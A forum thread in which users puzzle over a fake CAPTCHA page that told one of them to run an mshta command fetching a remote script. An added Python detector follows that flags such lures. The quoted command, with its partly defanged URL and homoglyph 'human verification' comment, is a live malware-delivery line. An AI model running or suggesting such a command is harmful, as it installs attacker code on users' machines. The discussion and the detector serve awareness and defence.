The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants me to run malware, but I’ve never seen something like this before.
Yeah, doesn’t mshta run JavaScript locally on Windows? This looks like a way to force you to run their script
I hope that URL isn’t the real one, you don’t want anyone trying it just to see what would happen
I have no idea how somebody might come up with this braindead, unintuitive and irreproducible mnemonic for a JavaScript interpreter but it sounds very much like something Microsoft would do.
https://www.virustotal.com/gui/url/d735247640472ab4a405600193afdcfd3d3757d163f52d8a5a5dfa3176df58c3/detection
Possibly.
BTW, certain malware may be able to break out of a VM.
On the other hand, some malware may recognize that it is being run in a VM and do absolutely nothing to avoid analysis.
I’m sure proper malware analysts have dedicated non-virtual machines they can just format between tests.
Now I wonder if there are motherboards with easily re-flashable firmware (from a read-only device that couldn’t be tampered with).
I’m curious what the script does, I’d love to reverse engineer it but don’t want to risk accidentally executing anything. Anyone with a disposable VM care to take the risk?
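A defender-side check for the kind of command quoted at the top of the thread, added here as an example and not written by any poster: it flags a pasted command that hands mshta a remote URL and carries a trailing "verification" comment written with look-alike Cyrillic letters. The sample string, the placeholder domain, the keyword list and the fold table are all constructed assumptions.

```python
import re
import unicodedata

LOLBINS = {"mshta", "mshta.exe"}  # the binary named in the thread
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
LURE_RE = re.compile(r"captcha|robot|human|verif", re.IGNORECASE)  # assumed keywords
# Cyrillic letters that render like Latin ones, folded to Latin (partial, assumed table).
FOLD = str.maketrans(
    "\u0430\u0435\u043e\u0456\u0441\u0440\u0445\u0410\u0415\u041e\u0421",
    "aeoicpxAEOC")

# Constructed sample: placeholder domain, Cyrillic homoglyphs written as escapes.
SAMPLE = ("mshta https://lure.example.invalid/page?i=CONSTRUCTED # "
          "Hum\u0430n, n\u043et \u0430 r\u043eb\u043et: "
          "CAPTCH\u0410 V\u0435rific\u0430tion ID: 000000")

def scripts_in(word):
    """Unicode scripts (first word of each character name) used by letters in word."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0]
            for ch in word if ch.isalpha()}

def mixed_script_words(text):
    """Words that mix scripts, e.g. Latin text with Cyrillic look-alikes swapped in."""
    return [w for w in re.findall(r"\w+", text) if len(scripts_in(w)) > 1]

def analyze(cmd):
    """Return the reasons a pasted command looks like a fake-CAPTCHA lure."""
    findings = []
    # Split on ' # ' so a '#' fragment inside the URL is not taken for a comment.
    command, _, comment = cmd.partition(" # ")
    tokens = command.split()
    binary = re.split(r"[\\/]", tokens[0])[-1].lower() if tokens else ""
    if binary in LOLBINS and URL_RE.search(command):
        findings.append("mshta-remote-url")
    if mixed_script_words(comment):
        findings.append("mixed-script-comment")
    # Fold homoglyphs first; a plain keyword match misses the disguised text.
    if LURE_RE.search(comment.translate(FOLD)):
        findings.append("verification-lure-text")
    return findings

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The keyword regex alone finds nothing in the sample because of the swapped letters, which is why the comment is folded before matching.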